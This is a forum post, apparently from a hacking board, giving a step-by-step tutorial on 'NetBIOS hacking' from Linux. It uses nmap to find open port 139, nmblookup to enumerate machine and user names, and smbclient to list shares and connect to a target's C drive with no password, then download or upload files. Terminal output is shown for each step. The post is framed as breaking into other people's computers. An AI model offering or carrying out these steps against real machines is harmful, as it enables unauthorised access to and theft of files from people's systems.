netbios hacking with samba
hope you enjoyed my last tut on netbios hacking from windows now i thought linux users will be winging cause they cant be elite_ha><oars as well so here it is netbios hacking for linux
the first step is to get samba an open source windows file sharing thing its avalible for download at
http://www.samba.org install it read the docs etc etc
now as in windows you need to make sure the computer has netbios running so we use nmap im sure most of you have and know how to use nmap but just in case get it and read the docs at
http://www.insecure.org/nmap/
thats the reults of my win98 box as you can see netbios is wide open now we need to check what computers on the networks we can connect toCode:[rioter@7337 rioter]$ nmap xxx.xxx.xxx.xxx Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ ) Interesting ports on (192.168.0.44): (The 1541 ports scanned but not shown below are in state: closed) Port State Service 139/tcp open netbios-ssn Nmap run completed -- 1 IP address (1 host up) scanned in 6 seconds
so we use
nmblookup -A ipaddress
<20> is the fileserver and its active <03> is the user who is logged in at the time and you can sometimes connect to those computersCode:[rioter@7337 rioter]$ nmblookup -A xxx.xxx.xxx.xxx Looking up status of 192.168.0.44 computername <00> - B <ACTIVE> workgroup <00> - <GROUP> B <ACTIVE> computername <03> - B <ACTIVE> computername <20> - B <ACTIVE> workgroup <1e> - <GROUP> B <ACTIVE> userloged in <03> - B <ACTIVE>
now to check what drives the computer your interested in has on it we use smbclient -Lcomputername -I ipaddress
it will ask for a password if its a non win 2k machine or it passsword protected you should just be able to hit enter and should let you through like it did on my computer
ok now your ready to connect to your computer we use smbclient againCode:[rioter@7337 rioter]$ smbclient -Lcomputername added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0 added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0 added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0 Got a positive name query response from xxxxxxx ( xxxxxxxx ) Password: Sharename Type Comment --------- ---- ------- I Disk J Disk G Disk H Disk F Disk D Disk E Disk C Disk EPSON Printer IPC$ IPC Remote Inter Process Communication Server Comment --------- ------- xxxxxxx xxxxxxx xxxx Workgroup Master --------- ------- xxx xxxxxxxxx
smbclient //computername/driveletter -I ipaddress -N
if your screen now looks like that you can browse their computer use normal dos commands ie dir etc etcCode:[jared@7337 jared]$ smbclient //xxxxxxx/C -I xxxxxxxx -N added interface ip=xxxxxxxx bcast=192.168.0.255 nmask=255.255.255.0 added interface ip=192.168.127.1 bcast=192.168.127.255 nmask=255.255.255.0 added interface ip=192.168.186.1 bcast=192.168.186.255 nmask=255.255.255.0 smb: \>
and also some ftp commands work but the ones you will probably use the most are get and put so get filname.exe will d/l the file for you to the current dir you are in
to exit just type exit
thats it easy aint it
to get other commands avalible to you on the programs we used just do a man program name
RiOtEr
well i have to thank negative for the formatting on the last one but also being a bitch today
and this isnt a desperate bid to get antipoints as jp said we take take take take
so i thought i would give give give
Reply With Quote